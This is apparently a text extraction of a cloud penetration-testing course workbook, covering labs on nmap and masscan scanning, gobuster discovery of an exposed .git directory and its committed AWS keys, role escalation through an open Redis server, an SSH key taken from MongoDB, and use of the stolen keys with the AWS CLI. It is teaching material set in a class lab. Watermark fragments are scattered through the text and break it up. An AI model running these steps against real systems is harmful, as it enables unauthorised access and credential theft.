/home/sec588/files/workdir/scan2 -O -sV --traceroute --script=redis*,mongo*
3e1e3b497543e6c11ac8e4188959c93e
20
The command above changes the script function so that we can modify the script scans but have the other
20
options enabled:
,
28
What is our new command option?
ly
Ju
--script=redis*,mongo* Script scan for any script nse les that being with mongo or redis
>
om
_c
-O OS Fingerprint Scan
ok
-sV Version Scan
23169600 @
ou
tlo
Traceroute Enable traceroute on the scan
66
s1
We now have additional output.

ne
ljo
Gregg Harris
au
$ gedit /home/sec588/files/workdir/scan2.nmap

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
We now see that we have both an Enumerable MongoDB and an Enumerable Redis scan.
ljo
Gregg Harris
au
<p
Replay of this lab

s
rri

Ha
gg
This lab displays the use of nmap and masscan in conjunction, but more importantly, it shows how you can
re
G
create a scanning pipeline. A pipeline that can provide us

:
To
Conclusion
d
nse
In this lab we explored using masscan and using nmap. While we didn't do an internet wide scan, import a large
ce
subnet block, or made use of all of masscan features, we did provide a work ow that is actionable in a real world
Li
live
scenario. Masscan can be used in conjunction with nmap to provide for a consistent accurate work ow that will
allow us to discover hosts.
We now have the following view of our environment.
1. We have several domains that we enumerated

2. We discovered some known and unknown host entries
3. We have discovered the ports that some of the hosts are using
4. We will now go further into discovering additional aws.
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 ou
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 1.4: Finding Secrets in
3e1e3b497543e6c11ac8e4188959c93e
Git
20
Brief Intro
, 20
28
Developers will use source code repository tools to save their work and collaborate between other developers.
ly
Sometimes these devleopers will accidently commit secrets into their code repositories in which they will
Ju
attempt to remove those items, or secrets by just deleting the les that they committed. This is not su cient to
>
remove the les completely from the repository. As such, an attacker that nds the repository can pull the les
om
back and use the key material.
_c
ok
23169600 @
ou
tlo
In this lab we will be requiring connectivity to our lab environment. Connectivity the 'dev' server will be required
66
as discovered in the previous labs.

s1
ne
Try It Yourself
ljo
Gregg Harris
au
<p
One of the servers that is in our list of hosts may have an exposed le that could provide us with some level of
authentication.
s
rri
Ha
To complete this task, you must:

gg
re
1. Enumerate all of the common subdirectories across the hosts.
G
2. Download the exposed le or directory with les.

:
To
3. If it is a Source Code repository, pull out the appropriate key material.

d
se
Walkthrough
n
ce
Li
Getting started
live
As we are doing reconnaissance let's try and get several tools together to attempt to pull down this exposed .git
directory.

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
The rst step would be to use gobuster. Gobuster can be run in 'dir' mode which will allow us to brute force
ljo
directories.
Gregg Harris
au
<p
This presents us with our rst problem, what are common scm directories and sensitive les?
s
rri
Ha
One possible option would have been to open scan1.nmap and look at the top of the text le. Run the
following command:
gg
re
G
less /home/sec588/files/workdir/scan1.nmap
:
To
d
Look for the line that reads:

n se
ce
Li
| http-git: ()
<ip>:80/.git/ ()
live

This indicates we have .git directory available on the host in the .git folder of the root. There are other ways we
can see this data. Let's look at a simple wordlist that we generated:
3e1e3b497543e6c11ac8e4188959c93e
$ cat /home/sec588/files/wordlists/scm.txt
20
,20
28
ly
Ju
>
om
_c
ok
This le just contains a small list of entries. Let's now look at our potential hosts:
23169600 ou
tlo
$ cat /home/sec588/files/workdir/dnsrecon.csv | awk -F, '{ print tolower($2) }' | sort -u |
@
grep -v name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt
66
s1
ne
ljo
Gregg Harris
au
<p
This is a very long string, but let's break down what is happening here.
s
rri
Ha
1. We cat out the dnsreconv.csv le

gg
2. We use awk to seperate each area by comma (,) and then we print all the characters lowercase, picking JUST
re
the second area which will be our urls
G
3. Next we sort uniquely all entries

:
To
4. Finally we send this list and remove two entries with grep -v, name and amazonaws entries.
5. All of this is sent to /home/sec588/ les/workdir/urls.txt.
d
n se
We now have a list of hosts to go and use Gobuster with.

ce
Li
Gobuster and a list of urls live

We have two challenges here.
1. Feed Gobuster a list of directories which we can do with the -w switch

2. Feed Gobuster a list of hosts to enumerate.

We have provided you with a command line argument to do this:
for URL in `cat /home/sec588/files/workdir/urls.txt`; do /opt/gobuster/gobuster dir -u $URL -w
3e1e3b497543e6c11ac8e4188959c93e
/home/sec588/files/wordlists/scm.txt -o /home/sec588/files/workdir/scm-$URL.txt; done
20
20
This particular script that we see has a few items to take now o , so let's look through this:
,
28
ly
1. We have a for loop in which we are placing into the URL variable whatever is contained in our txt le of urls.
Ju
2. The next section after the do is our gobuster command in which:
>
we use dir (for directory bruteforcing)
om
we use -u passing in whatever item in $URL we are working with now
_c
we are outputting with -o and adding to the end of the lename the $URL we are working on
ok
3. We end any loop with done.
23169600 @
ou
tlo
Once this completes we can see if any les contain any content:
66
s1
$ ls -la /home/sec588/files/workdir
ne
ljo
Gregg Harris
au
.sec588.net content:

d
se
$ cat /home/sec588/files/workdir/scm-dev.<class-subdomain>.sec588.net.txt
n
ce
Li
This should reveal that it has a .git directory. Let's go retrieve it.
Downloading from .git

live
Our .git directory is publicly exposed we can enumerate all the entries with something like wget!
$ cd /home/sec588/files/workdir

$ mkdir lab14
$ cd lab14
3e1e3b497543e6c11ac8e4188959c93e
$ wget --mirror -I .git http://dev.<class-subdomain>.sec588.net/.git/
Now that we have the git directory let's look through it:
20
20
$ cd dev.<class-subdomain>.sec588.net
,
28
ly
$ git log
Ju
>
om
The git log will show you a single commit. This commit may be of interest, considering that the comments have
the words: "Opps, committed the key".
_c
ok
23169600
"Opps" is spelled wrong as well. Unsure what the author may have been thinking when he did that.
@
ou
tlo
Let's review that commit, to do this you need to copy the hash value that is shown next to the word: "commit"
66
s1
$ git show <hash value>

ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live
If we have correctly put in the command at the bottom you will see two entries, more than likely colored in red
with a - in front of them.
-AWS_KEY=
-AWS_SECRET_KEY=

Store these values somewhere, we will use this in Day2, as we will see.
Replay of this lab
3e1e3b497543e6c11ac8e4188959c93e
Conclusion
In this lab we did a few things, we used Gobuster to comb through hosts in directory bruteforcing format. We
20
have then understood how to loop through a set of hosts passing in directory values. We have downloaded .git
20
exposed repositories. From those directories we are able to retrieve sensitive data. This sensitive data we have
found appears to be AWS keys that we may be able to use.
,
28
ly
If there has been a key exposure issue it is recommended that several steps be taken:
Ju
>
om
1. Revoke the exposed keys
2. Revoke all other keys
_c
3. Use Multi-Factor authentication with Keys when available like in AWS
ok
4. Consistently rotate your keys
23169600 @
ou
tlo
66
s1
This particular lab highlights some important issues with the git utility. The system itself is designed to keep a
ne
record of all changes, and as such deleting an incorrectly committed le along is not good enough to wipe out its
ljo
Gregg Harris
contents. Instead you need to completely remove the les using appropriate tools. A tool like BFG Repo-Cleaning
au
(https://rtyley.github.io/bfg-repo-cleaner/) can do this if you follow the process it describes. There are also auditing
<p
tools like gitleaks that will help you nd issues like these and resolve them.
s
rri
Ha

gg
re
Expirement with a tool called gitleaks. It can review the git repositories for leaks of other type of key material.
G
We will be looking for our key material in a di erent lab, but if you want a sneakpeak, we recommend running
:
To
this tool.
d
se
Here is an example of how to tool can be run:

n
ce
Li
$ docker run --rm -v /home/sec588/files/workdir/lab14/dev.<class-subdomain>.sec588.net/:/code/

--name=gitleaks zricethezav/gitleaks -v --repo-path=/code
live
This will show you many entries, but the rst few will be fairly familiar as they are the AWS Keys in our lab.

Lab 1.5: Exposed Databases
3e1e3b497543e6c11ac8e4188959c93e
Brief Intro
20
Exposing Databases and Session Stores to the internet accidently can happen, speci cally when dealing with
rapid deployments in highly dynamic environments. Even if the systems in the environment are not directly
20
exposed to the internet, they could also be accessed from within an environment. This lab will introduce the
,
28
impact of such an issue. We are going to look at the redis database instance that we are running and we are
going to look at the mongodb instance that we are also running. In these two environments we will nd
ly
Ju
mechanisms to control websites and potentially to expose potential problems.
>
om
_c
ok
connectivity. 23169600 @
ou
tlo
66
It is also recommended that Lab 1.2-Lab1.4 is completed so that an understanding of the environment thus far.
s1
ne
The wiki will be located here:

ljo
Gregg Harris
au
.sec588.net

:
To
2. Make a note of your session number and your user role.

d
3. Log into the redis database environment by using the redis-cli and attempt to modify your role from 'user' to
se
'admin'. Is there a change in the portal?

n
ce
4. Look at the MongoDB environment. The environment is not only enumerable but it can be changed.
Li
5. Attempt to change your favorite items.
live
6. Are there any special items located in the MongoDB instance? We will discover these later.
Walkthrough

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Validating our broken wiki

ljo
Gregg Harris
au
Let's try and update our local virtual machine wiki:

<p
s
rri
$ cd /opt/wiki
Ha
gg
$ sudo ./wiki-updater.sh
re
: G
To
d
n se
ce
Li
live
Based on our script we can see that we are getting a permission denied setting because we don't have the keys.
We will nd some keys potentially in the next few slides.

Looking at the dev site
Let's take a look at the dev site open up Firefox and navigate to http://dev.<class-subdomain>.sec588.net
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Once the page opens look at the Session ID area and take a note of it. Also take a note of the fact that you have a
ne
user.
ljo
Gregg Harris
au
<p
It also appears that you have a setting for the type of Beer you have.
s
rri
Ha
Please note that what you see in the screenshot will be di erent than what is in class, we may have one entries of
ve entries and the DNS name will be di erent
gg
re
: G
To
d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 ou
tlo
This particular envionment has a resolution back to the our host. We had previously discovered exposed
database ports for our domain. Let's try and take a look at some of these.
@
66
s1
Logging into Redis

ne
The redis server can be logged into via telnet, or alternatively we can use the developer and system
ljo
Gregg Harris
administration tools for redis. To do this we would use our redis-cli. We have provided you in the webpage a
au
shortcut to the dev server. It should be an amazonaws.com based domain.



:
To
d
nse
ce
Li
live
From the redis-cli type in the command:
<hostname:6379> KEYS *

Here you will see output of KEYS we should nd our KEY which should be located in our webpage. You can copy
and paste it out of Firefox. In the example above it was:
3e1e3b497543e6c11ac8e4188959c93e
Your keyname will be different
<hostname:6379> KEYS p8hsnhsaagpmk0iudoi6g7qam
20
We can now set a new value. We can play with values like: administrator.
, 20
<hostname:6379> SET p8hsnhsaagpmk0iudoi6g7qam administrator
28
ly
Ju
>
om
_c
ok
23169600 ou
tlo
We can see if we are a ecting the application by refreshing the page.
@
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Play with these values, maybe while the rst value may have not given you di erent access, maybe another
re
value will:
: G
To
d
se
root
n
()
ce
Administrator ()
Li
superuser ()
0 ()
admin () live
Each time you set a new key, refresh the page. Once you are satis ed you can type exit or close the shell.

Finding more secrets
While redis is designed to hold application state or be a session storage location, MongoDB is more of a
Document Object Store that many web applications use as a primary database. Let's attempt to connect to the
3e1e3b497543e6c11ac8e4188959c93e
MongoDB environment since it is not straight forward.
$ mongo --host <same host as redis> --port 27017
20
20
Once you are inside the mongoshell let's look at the databases that are shown:
,
28
> show databases
ly
Ju
>
Note admin, con g, and local are all standard databases that come with mongo
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
 use demo

gg
> db.getCollectionInfos()
re
: G
The db.getCollectionInfos() will show you the collections that are inside of the demo database.
To
d
n se
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
 db.beers.find().pretty()
re
G
This will show all the items in the beers collection. There seems to be a correlation. What could be in the other
:
To
collection?
d
se
> db.admin.find().pretty()
n
ce
Li
live

Save the keys from ----BEGIN to KEY----- into a le called /home/sec588/.ssh/sec588-wiki-keys-
oneline .
3e1e3b497543e6c11ac8e4188959c93e
You can use gedit to do this by typing the following command:
$ sudo gedit /home/sec588/.ssh/sec588-wiki-keys-oneline
20
Paste the entire long string in.
,20
28
Adding our keys into our VM
ly
Ju
From the MATE Terminal we now have a set of SSH Keys we can add to our Lab VM, but there is an exception.
The SSH Client doesn't accept a key that doesn't respect the 64 character per line keysize. Luckily we have a
>
om
simple script that does this. The script is as follows:
_c
ok
#!/bin/bash ()
23169600 @
ou
tlo
rm -Rf /home/sec588/.ssh/sec588-wiki-vm-keys ()
66
sed -e "s/-----BEGIN RSA PRIVATE KEY-----/&\n/"\ ()

s1
-e "s/-----END RSA PRIVATE KEY-----/\n&/"\ ()

ne
-e "s/\S\{64\}/&\n/g"\ ()
/home/sec588/.ssh/sec588-wiki-keys-oneline > /home/sec588/.ssh/sec588-wiki-vm-keys ()

ljo
Gregg Harris
chmod 400 /home/sec588/.ssh/sec588-wiki-vm-keys ()
au
<p
s
rri
Ha
The script can be called in the following fashion:

gg
re
$ /home/sec588/files/rsajoin/rsajoin.sh
: G
To
Sometimes you see an issue with the RSAJoin where an extra space (or new line) is added before -----END
we recommend editing the le and removing it.
d
RSA PRIVATE KEY-----

nse
ce
$ sudo gedit /home/sec588/.ssh/sec588-wiki-vm-keys

Li
live
Once the le is correct you will also need to change the permissions, this will x the keys but they also need to be
committed to the right permissions.
$ chmod 0400 /home/sec588/.ssh/sec588-wiki-vm-keys
If this works you should be able to update the wiki by typing the following commands:

$ cd /opt/wiki
$ ./wiki-updater.sh
3e1e3b497543e6c11ac8e4188959c93e
Replay of this lab
Conclusion
20
20
In this lab we have discovered an SSH Key burried within an admin key in the MongoDB environment. While this
,
28
is not necessarily always the case, the primary objective of the lab was to demonstrate the dangers of exposing
a Databses to the open internet or alternatively if an attacker has shell access to a server they can discover a
ly
Ju
database that exists already and manipulate an application in runtime.
>
om
We will be exploring these concepts more in a future lab.
_c
ok
23169600 ou
tlo
Miscon gurations such as exposing databases into the public cloud can happen quite easily in a rapidly moving
@
cloud system. It is important to understand what the impacts are to such a system.
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 1.6: EyeWitness in the
3e1e3b497543e6c11ac8e4188959c93e
Cloud
20
Brief Intro
, 20
28
Our eyes have the capacity to pick out information visually at times much quicker than we would normally have
ly
given text. It is takes us longer to read through words, and our minds tend to self correct or focus on the wrong
Ju
things. EyeWitness provides us the capability to take screenshots of http pages and then allow us to view them in
>
a single report style page which could yeild us an e ciencies through saving us valuable time. We can also gleen
om
valuable information, maybe a website has lots of javascript and isn't named in a way that we are able to
_c
understand its own functionality. This tool can give us this capability.
ok
ou
tlo
66
In this lab it will be required to have completed the rst 5 labs.

s1
ne
By now you should have found the Wiki and even downloaded it locally to your computer.
ljo
Gregg Harris
au
The wiki will be located here:

<p
s
rri
Ha
Try It Yourself
gg
re
G
In this particular lab we are going to be taking the sites that we have found and start to catalog them into a
:
To
single report view using EyeWitness.

d
se
To do this you will want to create an A/B comparison. To create an A/B comparison we recommend for you to
n
ce
create a list of IP addresses in your workdir and then a list of hostnames.

Li
live
$ gedit /home/sec588/files/workdir/ips.txt
$ gedit /home/sec588/files/workdir/urls.txt

You can run EyeWitess.py from the /opt/eyewitness directory. It does require a --web command lineargument.
You can also pass a tool like dnsrecon.py the -c ag to create a CSV. We would recommend you use
DNSRecon.py to create a list of URL's, however you wish to do it, it may be easier to automate this process.
3e1e3b497543e6c11ac8e4188959c93e
Walkthrough
Getting a list of scanning targets
20
20
,
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
We are going to follow the process we have been following to obtain ip addresses and hosts names to scan.
n se
ce
Starting with using dnsrecon.py let's build a list of hosts

Li
$ cd /opt/dnsrecon live
/home/sec588/files/wordlists/subdomains-5k.txt -t brt,crt -c

This will generate a csv le that you can use to build a list of URL's, there are 2 ways to do this:
1. Manually copy the hostnames into /home/sec588/ les/workdir/urls.txt
3e1e3b497543e6c11ac8e4188959c93e
2. Use awk to just pull out the correct sections that are in the csv.
This is the awk command below, you can choose either method you are comfortable with:
20
$ awk -F, '{ print tolower($2) }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v
20
Name | grep -v amazonaws > /home/sec588/files/workdir/urls.txt
,
28
The reason the command has miltiple pipe operators is to remove the duplicate entries, and remove junk like
ly
Ju
the CSV header of Name and the Amazon AWS CNAME's. Once this is done you can now copy this list into a le
for use with eyewitness. This is what the > does.
>
om
_c
Now we can attempt to do the same with Masscan. We have all of the hostnames, but we also have all the IP's
ok
that are associated with this particular domain. Let's obtain those IP addresses.
23169600 ou
tlo
$ awk -F, '{ print $3 }' /home/sec588/files/workdir/dnsrecon.csv | sort -u | grep -v Address |
@
grep -v '^$' > /home/sec588/files/workdir/ips.txt
66
s1
We now have two lists, one for URL's and one for IP addresses. We can make this one list but let's see what will
ne
happen if we run the tools in this way.

ljo
Gregg Harris
au
Getting EyeWitness to process IP's.

<p
s
Let's rst get into our EyeWitness Directory, now that we have the prerequisite les. Let's run the rst collection
rri
Ha
of IP's.
gg
$ cd /opt/eyewitness
re
: G
To
$ ./EyeWitness.py --web -f /home/sec588/files/workdir/ips.txt

d
se
When this is complete it will ask you if you wish to view the report now, enter a "Y" and hit Enter. This will load
n
Firefox with the report.

ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
We can see that some pages are indeed avaiable in the system using this method, but this is all subject to
ok
implementation as most systems using the Host: header in HTTP to direct them to their appropriate site. This is
23169600
default amazon page. Let's try and correct this.
@
ou
tlo
what occurs with Amazon S3, and we do not see our websites with the Amazon S3 addresses instead we see the
66
$./EyeWitness.py --web -f /home/sec588/files/workdir/urls.txt

s1
ne
The di erence between both reports will be somewhat evident in that now we are no longer seeing any pages
ljo
that are from the hosting provider. We can understand that its hosted on AWS IP space in many ways and one of
Gregg Harris
au
the more simple ones is to just try the page by IP address. This is just a simple visual indicator that will be
<p
potentially lost using the URL's. There are other markers which we will discuss later like the AMZN header.
s
rri
Ha
gg
re
: G
To
d
n se
ce
Li
live

Now notice at the top of each page there is a section called 'Uncategorized', EyeWitness uses a le called
categories.txt. If you open this le you will see how this tool is matching sites.
3e1e3b497543e6c11ac8e4188959c93e
$ cat categories.txt
What it's doing is gathering a string of texts and placing it in a category by appending a pipe operator '|' and
then the category afterwards. As these sites do not match any text it will not be caterogized.
20
20
As always if you feel that you can contribute to a tool and provide a set of categories back to the author they may
,
accept a pull request like this.
28
ly
Ju
Replay of this lab
>
om
Conclusion
_c
ok
In this lab we have:
23169600
1. Surface reviewed the contents of our exposed systems
@
ou
tlo
2. Viewed the A/B Comparison between these hostnames and IP scanning of these systems
66
s1
We can now continue to review this environment and assess for it any weakeness that we may encounter
ne
ljo
Why This Lab Is Important Gregg Harris

au
<p
s
This lab is important because Reconnassaiance, asset discovery, and surface area enumeration are critical
rri
components when it comes to the beginning of understanding how to assess an environment or how to properly
Ha
defend it. We feel that using tools like this provide a great advantage to both red and blue teams.
gg
re
:G
To
d
n se
ce
Li
live

Lab 2.1 HTTP and Postman
3e1e3b497543e6c11ac8e4188959c93e
Tour
20
Brief Intro
,20
28
This lab walks you through using Postman and cURL. The lab serves as both a tour of Postman as well as getting
ly
familiar with cURL. These tools will serve you well as both attackers and defenders as they can provide you with
Ju
an interface into an API system.
>
om
_c
ok
23169600
will also require two command line tools:
@
ou
tlo
This lab does not require that Section 1 be done, however it would be bene cial to have those URL's available. It
66
Postman and cURL

s1
ne
These two should available on your VM.

ljo
Gregg Harris
au
Try It Yourself
<p
s
rri
This lab will demonstrate how to use Postman and the cURL tool for testing both API's and Web applications.
Ha
gg
1. Use your browser to look at the functionality of httpbin.org

re
2. Attempt a request with /patch method in cURL and execute a request with the a header of
G
application/json
:
To
3. Simulate the same request with Postman

d
4. Create a temporary environment in Postman

se
5. Use variable expansion to expand the method

n
ce
6. Create variables for usernames and passwords

Li
7. Create a request to /basic-auth with the username and password variables
live
8. Once this is validated, get the cURL equivlent command and attempt it.
Walkthrough
Simulating Swagger API using Postman

Let's open the MATE terminal so that we can launch Postman
3e1e3b497543e6c11ac8e4188959c93e
20
20
,
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
Once the terminal is open type the following commands:

<p
s
rri
$ cd /opt/postman
Ha
gg
Start Postman as follows:

re
G
./Postman
:
To
d
There is an icon on the desktop as well, either one will take a few minutes to open.
nse
ce
Once Postman is open you will presented with the the Postman UI
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
The UI screen can be maixmized to be able to use our screen real-estate. Let's now create a new request. Do
_c
not click on the new button, instead click on the + to open a new tab next to the Launchbar bar.
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Now we will focus on creating a request that we can work with. To get familiar with tool let's visit httpbin.org
gg
re
G
Open Firefox from your taskbar. Let us go to the following URL:

:
To
d
http://httpbin.org/
n se
ce
This website is a page with functionality to help you understand how API's tend to work. The website is for you to
Li
learn with, and so there are many options to play with. The entire website is developed with the Swagger API
live
which is a popular API standard with their own API Schema that they published.

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Click the HTTP Methods Button on the page to open the Swagger API calls that are supported.
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
nse
We see that we a large number of methods that are supported with this set of calls, each one of these methods
ce
DELETE, GET, PATCH, POST for this example is hosted in the paths with the same name. So you can call DELETE
Li
on the /DELETE route, you can call GET in the /GET route and so on and so on.
live
Let us now con gure Postman to play with some of these, let's open PATCH.
First click on the PATCH area to open the Swagger capability to perform the action for yourself.

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
Now some of the items that we will want to focus in on is the fact that this request when executed, will be with
the application/json request type, not the typical text/html request. By clicking the word execute it will
ly
Ju
execute the command in the browser.
>
om
The execute command will only show up after you click 'Try it out'
_c
ok
23169600 @
ou
tlo
66
s1
ne
Look at the output, we see a few items. First the cURL equivalent to execute the command, secondly we see the
ljo
JSON output of the command. How can we replicate this in Postman?
Gregg Harris
au

om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
If you wish to make a note of the cURL command you can, this guide will replicate the command for you. It is:
Gregg Harris
au
<p
curl -X PATCH "http://httpbin.org/patch" -H "accept: application/json"

s
rri
Ha
Emulating the request in Postman

gg
Open Postman and in the request window, in the method area switch the method from GET to PATCH, in the URL
re
put http://httpbin.org/patch . Hit the send button to get a response.
: G
To
d
nse
ce
Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
We can inspect the response in the response body. You can see the origin and some of the other output its in it's
23169600 tlo
format. Let's now play around with environments. In the upper right hand corner click the eyeball.
@
ou
Click the add`` button, if you have an existing environment the button will say edit . Name the
66
environment Lab2.1 Temporary```.

s1
ne
ljo
Gregg Harris
au

om
_c
ok
Interface. 23169600 @
ou
tlo
Click update and then hit add and do this all over again. There is a bug in this version of the User
Once you see in the list of environments hit the X in the corner of this area to close it.
66
Lab 2.1 Temporary

s1
ne
Select the drop down in the environment to choose Lab 2.1 Temporary as the environment.
ljo
Gregg Harris
au
In the URL of the request remove the word patch and replace it with {{method}} as is shown in the
<p
screenshot below.
s
rri
Ha
gg
re
: G
To
d
nse
ce
We have now created a variable that we can change over time. Let's now make this API do some additonal
Li
things. One of the common items we may have to deal with is Authorization. The httpbin.org website does allow
live
us to attempt a basic authentication. Let's setup basic authentication with Postman
Lets rst setup our environment for reusability. Click back into the environment window using the eyeball, and
click 'edit'. Change the methods from the current vaue being patch to get. Set a new value

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Key: Initial and Current value:

s1
username sec588
ne
ljo
Key: password Initial and Current value: password
Gregg Harris
au
<p
Now let's modify our request. In the URL change it to:

s
rri
Ha
http://httpbin.org/basic-auth/{{username}}/{{password}}
gg
Next in the method change it to a GET request. Finally change the Authorization to Basic Auth. Set the username
re
to and password {{password}} .
G
{{username}}
:
To
d
nse
ce
Li
live

Now let's take a look a the postman code command by click on the 'code' button on the screen as highlighted:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
ly
Ju
>
om
_c
ok
This will present you with a menu that has the dropdown for di erent languages. Find the 'curl one' as shown
below.
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
Copy the curl command, once it is copied, open a MATE terminal and paste the curl command in.
gg
re
: G
To
d
n se
ce
You can see that this now executes correctly.

Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
Replay of this lab
ly
Ju
>
om
_c
We will be using postman to simulate requests to API's through our labs, learning how postman works will be a
ok
critical utility to be able to build an automate attacks. Sometimes developer tools, tend to be very powerful
23169600 tlo
attack tools, we need to embrace these tools as they may be available ahead of our attack tools wrapper.
@
ou
66
s1
ne
SANS SEC642: Advanced Web Application Penetration Testing (https://www.sans.org/sec540)

ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
:G
To
d
nse
ce
Li
live

Lab 2.2 Using the AWS CLI
3e1e3b497543e6c11ac8e4188959c93e
and Enumerating Users
20
Brief Intro
, 20
28
We are currently in our Mapping section where we are looking at how to be more e ecient when we map out
ly
networks, applications, and services.
Ju
>
Throughout this course you will be interacting with many of Amazon Web Services API's. The simplest way to
om
facilitate access to the AWS API, outside of a tool that may constain some of the API while automating other
_c
parts is to be familiar with the API itself. The easiest way to become intimately familiar is with the use of the
ok
Amazon AWS CLI tool. In this lab we will start to work with the tool, including con guring a key by hand, working
23169600
with lters and queries and iterating through sets of data. @
ou
tlo
We discovered an AWS Key string potentially in our Day 1 Lab 4 exersize. Let's see if we can actually attempt to
66
use those particular keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can
s1
help us get further into the environment.

ne
ljo
Requirements for This Lab Gregg Harris

au
<p
s
This lab would require you have completed all of the Day1 exercises, however we will be reviewing many of the
rri
topics in the prerequisite sections. This lab does require connectivity to our AWS Environment.
Ha
gg
It will also require that we have our AWS tools in our vm installed, you can check this by typing the following
re
commands in the cli and looking for the aws help message:
: G
To
$ aws
d
n se
Try It Yourself
ce
Li
live
In the previous day in Lab 1.4 we found what appeared to be Amazon Web Services API Keys. In this lab we will
be looking at the API keys.
1. Con gure a pro le using the keys with the name lab22
2. List out all of the contents within the s3 bucket of pictures..sec588.net
3. Try and see if you have permissions to read all s3 buckets

4. See what username you are logged in as
5. Try and get all the Public IP Addresses from the EC2 Instances that are currently in production.
6. Match the IP Addresses to their perspective security groups to be able to see what types of ports are allowed
in.
3e1e3b497543e6c11ac8e4188959c93e
Walkthrough
20
Con guration of AWS Pro les
,20
28
Let's open a MATE terminal to con gure the appropriate pro le in AWS:
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
: G
To
d
se
In the CLI we are going to con gure a pro le called lab22

n
ce
Li
aws configure --profile lab22
live
Let's ll in the information with what we have had presented to us. In Lab 1.4 we found API keys in a git commit of
a .env le. Let's open those up and answer the questions in con gure:
AWS= will be the answer to the rst question

AWS_KEY= will be the answer to the second question
The region can be set to: us-east-1
3e1e3b497543e6c11ac8e4188959c93e
We have provided an example screenshot below:
20
,20
28
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
Let's test to see what permissions we have, rst you can see what the tool supports by using the help
<p
commands:
s
rri
Ha
$ aws help
gg
re
$ aws s3 help
:G
To
We have provided you some commands to try, now we understand that we haven't provided you with a ton of
d
context on the tool, and that will be comming here in a minute, but let's play with the AWS CLI to understand the
se
options.
n
ce
Li
THE FOLLOWING COMMAND WILL FAIL!
$ aws s3 ls live

3e1e3b497543e6c11ac8e4188959c93e
But why? We need to pass it the appropriate pro le to use and to ensure we highlight this critical feature we
wanted to display what happens without the command.
20
20
$ aws s3 ls s3://pictures.<class-subdomain>.sec588.net --profile lab22
,
28
We are going to provide you a s3url that you can use to explore, speci cally we will provide you with the images
ly
Ju
s3 bucket. You can also copy anything you wish out of this s3 bucket, it can be any le in here. Speci cally lets
take our raven picture and the secretdata.txt le.
>
om
_c
$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/raven.png
ok
/home/sec588/files/workdir/raven.png
23169600 ou
tlo
$ aws s3 cp --profile lab22 s3://pictures.<class-subdomain>.sec588.net/secretdata.txt
@
/home/sec588/files/workdir/secretdata.txt
66
s1
ne
ljo
If you wish to open
Gregg Harris
au
this le you can it's in the files/workdir directory.

<p
s
The speci c IAM Access Control entry we have is for s3:Get* which would allow us to get buckets. We may
rri
also be able to perform speci c s3 operations if the s3 bucket policy is not restrictive. Now let's try and list all
Ha
buckets.
gg
re
$ aws s3 ls --profile lab22
: G
To
This yields us a permissions denied setting, let's see what else we may be able to do. To see what user this
d
bucket has you can use IAM

n se
ce
$ aws iam get-user --profile lab22

Li
live

3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
ly
Ju
>
om
_c
You can see the use will be the bob- user. We will try one more thing let's place with enumerating all the public IP
ok
23169600
addresses like we described in an earlier slide:
@
ou
tlo
The commands after jq are case sensitive ensure you have the proper casing!
66
aws ec2 describe-instances --profile lab22 | jq '.Reservations[] | .Instances[]

s1
.PublicIpAddress'
ne
ljo
Gregg Harris
While this command above provides the details of the IP addresses we need to do some work to get the security
au
group tied to those addresses. Let's play around with some of the commands to see what exactly happens when
<p
we try and iterate through these.

s
rri
Ha
The rst step is to play with the string interpolation feature of jq to be able to pull out the instance ID and the Ip
Address, these are both contained in the same place:
gg
re
G
